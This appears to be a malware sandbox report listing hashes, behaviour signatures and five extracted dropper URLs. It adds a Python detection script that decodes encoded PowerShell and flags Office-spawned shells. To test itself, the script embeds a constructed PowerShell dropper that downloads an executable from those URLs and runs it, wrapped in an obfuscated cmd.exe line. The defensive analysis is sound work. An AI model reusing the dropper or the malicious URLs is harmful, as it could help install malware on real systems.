General

  • Target

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • Size

    112KB

  • Sample

    220731-k69ecshef2

  • MD5

    bb7ac1a1873e29db1f7ad69aaf4a8127

  • SHA1

    e7a082ff41d8cc4a09d3f852c46cfb808659b476

  • SHA256

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • SHA512

    9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

Score
10/10

Malware Config

Extracted

  • Language

    ps1 (deobfuscated)

  • URLs (exe.dropper)

    http://solvolab.com/sdB
    http://kenstones.com/pR
    http://benvisuals.com/S2hMkKS
    http://www.clinicacirurgiaplasticasp.com.br/Jmz
    http://pride.ge/0e40iT

Targets

    • Target

      c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

    • Size

      112KB

    • MD5

      bb7ac1a1873e29db1f7ad69aaf4a8127

    • SHA1

      e7a082ff41d8cc4a09d3f852c46cfb808659b476

    • SHA256

      c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

    • SHA512

      9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
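The three signatures above (an Office parent spawning a shell, a caret-obfuscated cmd.exe command line, and the encoded PowerShell dropper whose URL list the config extraction recovered) can be reproduced offline with the following Python script. It is an added example, not the sandbox's own code: the process-creation events, the PowerShell body and the function names are constructed assumptions that mimic the usual multi-URL dropper shape, and only the five URLs are taken from the extracted config on this page.

```python
"""Offline reproduction of the report's three findings on constructed data.

Added example, not the sandbox's code. EVENTS and SCRIPT are constructed;
only the five URLs are taken from the extracted config above.
"""
import base64
import re
from typing import Dict, List, Optional

# Office hosts that have no business spawning a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -e / -enc / -encodedcommand followed by a base64 blob (PowerShell decodes it as UTF-16LE).
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Stop at quotes, '@' and ';' so an '@'-joined URL list splits into separate URLs.
URL_RE = re.compile(r"https?://[^\s'\"@;,)]+", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # bad base64 (binascii.Error) or odd-length / invalid UTF-16
        return None


def extract_urls(script: str) -> List[str]:
    """Undo cheap string-splitting obfuscation, then pull out unique URLs in order."""
    joined = re.sub(r"'\s*\+\s*'", "", script.replace("`", ""))
    seen: Dict[str, None] = {}
    for url in URL_RE.findall(joined):
        seen.setdefault(url, None)
    return list(seen)


def _image_name(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(events: List[dict]) -> Dict[str, List[str]]:
    """Apply the three checks to process-creation events (pid, ppid, image, cmdline)."""
    by_pid = {e["pid"]: e for e in events}
    out: Dict[str, List[str]] = {"unexpected_children": [], "obfuscated_cmdlines": [], "dropper_urls": []}
    for e in events:
        child = _image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        if parent and _image_name(parent["image"]) in OFFICE_PARENTS and child in SHELL_CHILDREN:
            out["unexpected_children"].append(f"{_image_name(parent['image'])} -> {child}")
        # cmd.exe ignores carets, so "p^o^w^e^r^s^h^e^l^l" still runs powershell but defeats naive matching.
        cleaned = e["cmdline"].replace("^", "")
        if child == "cmd.exe" and cleaned != e["cmdline"]:
            out["obfuscated_cmdlines"].append(cleaned)
        script = decode_encoded_command(cleaned)
        if script:
            for url in extract_urls(script):
                if url not in out["dropper_urls"]:
                    out["dropper_urls"].append(url)
    return out


# Constructed dropper body in the usual shape: try each URL in turn, save to %TEMP%, execute.
SCRIPT = (
    "$u='http://solvo'+'lab.com/sdB@http://kenstones.com/pR@http://benvisuals.com/S2hMkKS"
    "@http://www.clinicacirurgiaplasticasp.com.br/Jmz@http://pride.ge/0e40iT'.Split('@');"
    "$p=$env:temp+'\\'+(Get-Random)+'.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);Start-Process $p;break}catch{}}"
)
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (pids are arbitrary).
EVENTS = [
    {"pid": 1200, "ppid": 800, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2332, "ppid": 1200, "image": "winword.exe", "cmdline": "WINWORD.EXE /n invoice.doc"},
    {"pid": 2410, "ppid": 2332, "image": "cmd.exe",
     "cmdline": "cmd /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -e " + ENCODED},
    {"pid": 2488, "ppid": 2410, "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -e " + ENCODED},
    {"pid": 2500, "ppid": 1200, "image": "notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for key, hits in analyze(EVENTS).items():
        print(key)
        for h in hits:
            print("  ", h)
```

Running it prints one unexpected-child edge (winword.exe -> cmd.exe; the cmd.exe -> powershell.exe edge is not flagged because cmd.exe is not an Office parent), the de-careted cmd.exe command line, and the five dropper URLs in the order the script would try them. Real event sources (Sysmon event 1, EDR telemetry) carry the same four fields, so only the input adapter needs to change.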

MITRE ATT&CK Enterprise v6

Tasks